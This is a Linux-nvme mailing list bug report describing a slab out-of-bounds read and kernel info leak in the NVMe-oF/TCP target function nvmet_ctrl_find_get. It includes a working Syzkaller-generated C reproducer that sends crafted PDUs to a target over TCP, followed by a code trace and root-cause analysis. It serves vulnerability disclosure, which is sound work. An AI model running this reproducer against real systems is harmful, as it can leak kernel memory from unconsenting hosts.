[Bug Report] NVMe-oF/TCP - Slab OOB Read in `nvmet_ctrl_find_get`
Alon Zahavi
zahavi.alon at gmail.com
Mon Nov 6 05:37:39 PST 2023
# Bug Overview
## Bug Summary
A slab out-of-bounds read happens in`nvmet_ctrl_find_get` execution,
when reaching a `pr_warn()`.
## Bug Location
`drivers/nvme/target/core.c` in the function `nvmet_ctrl_find_get`.
## Bug Class
Kernel Information Leak
## Disclaimer:
This bug was found using Syzkaller with NVMe-oF/TCP added support.
# Technical Details
## In a Few Words
Due to a string initialization without checking for NULL terminator, a
later print of that string can cause a kernel info leak.
Although the bug can be triggered remotely, the info leak is local only.
## Reproducer
DISCLAIMER: This reproducer was generated by Syzkaller, with some
optimizations by me.
```
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
uint64_t r[1] = {0xffffffffffffffff};
void loop(void)
{
intptr_t res = 0;
res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
if (res != -1)
r[0] = res;
*(uint16_t*)0x20000100 = 2;
*(uint16_t*)0x20000102 = htobe16(0x1144);
*(uint32_t*)0x20000104 = htobe32(0xc0a8eb8b);
syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
*(uint8_t*)0x200001c0 = 0;
*(uint8_t*)0x200001c1 = 0;
*(uint8_t*)0x200001c2 = 0x80;
*(uint8_t*)0x200001c3 = 0;
*(uint32_t*)0x200001c4 = 0x80;
*(uint16_t*)0x200001c8 = 0;
*(uint8_t*)0x200001ca = 0;
*(uint8_t*)0x200001cb = 0;
*(uint32_t*)0x200001cc = 0;
memcpy((void*)0x200001d0,
"\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
"\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
"\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
"\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\x86\xcf\xbf"
"\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
"\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
"\xcf\xbf\x35\x86\x00\x00\x00\x00\x00\x00",
112);
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
*(uint8_t*)0x20000000 = 5;
*(uint8_t*)0x20000001 = 1;
*(uint8_t*)0x20000002 = 0;
*(uint8_t*)0x20000003 = 0x3f;
*(uint32_t*)0x20000004 = 0xbb7;
*(uint32_t*)0x20000008 = 0x7ff;
*(uint16_t*)0x20000010 = 4;
*(uint16_t*)0x20000012 = 0x81;
*(uint16_t*)0x20000014 = 7;
*(uint16_t*)0x20000016 = 5;
*(uint64_t*)0x20000080 = 0x20000440;
memcpy(
(void*)0x20000440,
"\x39\x1f\xcb\x1d\x48\xf0\x52\x9a\x1a\xed\x88\xfe\x10\xa6\x2b\xcd\xfe\xbd"
"\x3c\x87\xb7\x2d\x35\x8d\xb3\x14\x80\xcf\x0e\x51\x27\x71\x7b\xc2\x39\x93"
"\x1a\xa6\xce\xaf\xe2\x2a\x5a\x2f\x04\x06\x5f\x50\x32\x52\x04\xf0\x9a\x4b"
"\xac\xcc\x0d\x73\x9e\xb9\x60\x52\x4b\xe8\x47\xca\x3e\x9c\xaa\xdd\x50\x7d"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAB"
, 841);
syscall(__NR_sendto, /*fd=*/r[1], /*pdu=*/0x20000000ul, /*len=*/0x88ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
*(uint8_t*)0x200001c0 = 4;
*(uint8_t*)0x200001c1 = 0;
*(uint8_t*)0x200001c2 = 0x48;
*(uint8_t*)0x200001c3 = 0;
*(uint32_t*)0x200001c4 = 0x48;
*(uint8_t*)0x200001c8 = 0x7f;
*(uint8_t*)0x200001c9 = 0x40;
*(uint16_t*)0x200001ca = 0;
*(uint8_t*)0x200001cc = 1;
memset((void*)0x200001cd, 0, 19);
*(uint64_t*)0x200001e0 = 0;
*(uint32_t*)0x200001e8 = 0x400;
memcpy((void*)0x200001ec, "\x5f\x19\x6e", 3);
*(uint8_t*)0x200001ef = 1;
*(uint16_t*)0x200001f0 = 0;
*(uint16_t*)0x200001f2 = 4;
*(uint16_t*)0x200001f4 = 0;
*(uint8_t*)0x200001f6 = 0;
*(uint8_t*)0x200001f7 = 0;
*(uint32_t*)0x200001f8 = 0;
memset((void*)0x200001fc, 0, 12);
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
*(uint8_t*)0x200003c0 = 4;
*(uint8_t*)0x200003c1 = 0;
*(uint8_t*)0x200003c2 = 0x48;
*(uint8_t*)0x200003c3 = 0;
*(uint32_t*)0x200003c4 = 0x48;
*(uint8_t*)0x200003c8 = 0;
*(uint8_t*)0x200003c9 = 0;
*(uint16_t*)0x200003ca = 0;
*(uint32_t*)0x200003cc = 0;
*(uint64_t*)0x200003d0 = 0;
*(uint64_t*)0x200003d8 = 0;
*(uint64_t*)0x200003e0 = 0;
memcpy((void*)0x200003e8, "\x11\x25\xed", 3);
memcpy((void*)0x200003eb, "\x19\x15\x2c\x6a", 4);
*(uint8_t*)0x200003ef = 0;
*(uint32_t*)0x200003f0 = 0;
*(uint32_t*)0x200003f4 = 0;
*(uint32_t*)0x200003f8 = 0;
*(uint32_t*)0x200003fc = 0;
*(uint32_t*)0x20000400 = 0;
*(uint32_t*)0x20000404 = 0;
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200003c0ul, /*len=*/0xfffffe7aul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
loop();
return 0;
}
```
## In More Details
### Tracing The Bug
In the reproducer below, we send, in the first `sendto`, the ICReq
packet for the NVMe/TCP target. After that, we are sending another
“Fabric Command” with the opcode 0x7f,
with some additional data. This additional data is 768 bytes that will
be later copied in the target to an SGL. The SGL’s data will later be
copied to an object of type `struct nvmf_connect_data` (Code Block 2)
during the execution of `nvmet_execute_io_connect` (Code Block 1).
Code Block 1:
```
static void nvmet_execute_io_connect(struct nvmet_req *req)
{
...
struct nvmf_connect_data *d; // 1
...
d = kmalloc(sizeof(*d), GFP_KERNEL);
if (!d) {
status = NVME_SC_INTERNAL;
goto complete;
}
status = nvmet_copy_from_sgl(req, 0, d, sizeof(*d)); // 2
if (status)
goto out;
...
ctrl = nvmet_ctrl_find_get(d->subsysnqn, d->hostnqn,
le16_to_cpu(d->cntlid), req); // 3
if (!ctrl) {
status = NVME_SC_CONNECT_INVALID_PARAM | NVME_SC_DNR;
goto out;
}
...
}
```
Code Block 2:
```
struct nvmf_connect_data {
uuid_t hostid;
__le16 cntlid;
char resv4[238];
char subsysnqn[NVMF_NQN_FIELD_LEN]; // NVMF_NQN_FIELD_LEN is 256
char hostnqn[NVMF_NQN_FIELD_LEN]; // NVMF_NQN_FIELD_LEN is 256
char resv5[256];
};
```
Code Block 1 Break Down:
1. The driver declares the variable d of type `struct
nvmf_connect_data` (See Code Block 2).
2. The driver uses `nvmet_copy_from_sgl` to copy the data from the SGL
to the variable `d`.
3. The driver calls the function `nvmet_ctrl_find_get` (Code block 3),
which will later on cause the slab OOB.
When filling `d`, The driver fills the entirety of d including
`subsysnqn`, `hostnqn`, and `resv5`. We know that `subsysnqn`,
`hostnqn` are supposed to be strings, but when filling `d`,
`nvmet_copy_from_sgl` ignores that fact and does not check if there is
a NULL terminator for those strings.
When the execution reaches the function `nvmet_ctrl_find_get`, if the
`nvmet_find_get_subsys` would not find the subsystem NQN, thus
returning 0, a warning would be printed, dereferencing `subsysnqn`
(which represents `d->subsysnqn`) as a string. Because we already know
that `d->subsysnqn` is not NULL terminated, the print operation will
overflow and will print `d->hostnqn` as well, and even overflow to
print `d->resv5`. The print will continue to overflow until the first
NULL will be reached. This behaviour will most likely cause an info
leak of kernel addresses, because `d` is allocated on the `kmalloc-1k`
slab cache, thus leaking the memory of the next object in the memory.
Code Block 3:
```
struct nvmet_ctrl *nvmet_ctrl_find_get(const char *subsysnqn,
const char *hostnqn, u16 cntlid,
struct nvmet_req *req)
{
struct nvmet_ctrl *ctrl = NULL;
struct nvmet_subsys *subsys;
subsys = nvmet_find_get_subsys(req->port, subsysnqn); // 1
if (!subsys) {
pr_warn("connect request for invalid subsystem %s!\\n", subsysnqn); // 2
req->cqe->result.u32 = IPO_IATTR_CONNECT_DATA(subsysnqn);
goto out;
}
...
}
```
Another thing to point out is the function `nvmf_connect_data_prep`.
There is an initialization there, in which both `subsysnqn` and
`hostnqn` are initialized using the strncpy with maximum size of
`NVMF_NQN_SIZE`, a macro for 223, the actual max length of an NQN
name.
Code Block 4:
```
// From `linux/include/nvme.h`
/* NQN names in commands fields specified one size */
#define NVMF_NQN_FIELD_LEN 256
/* However the max length of a qualified name is another size */
#define NVMF_NQN_SIZE 223
```
## Root Cause
As explained above, the root cause for this bug is the fact that there
are no NULL terminators to the strings in the object representing the
`struct nvmf_connect_data`.
More information about the Linux-nvme
mailing list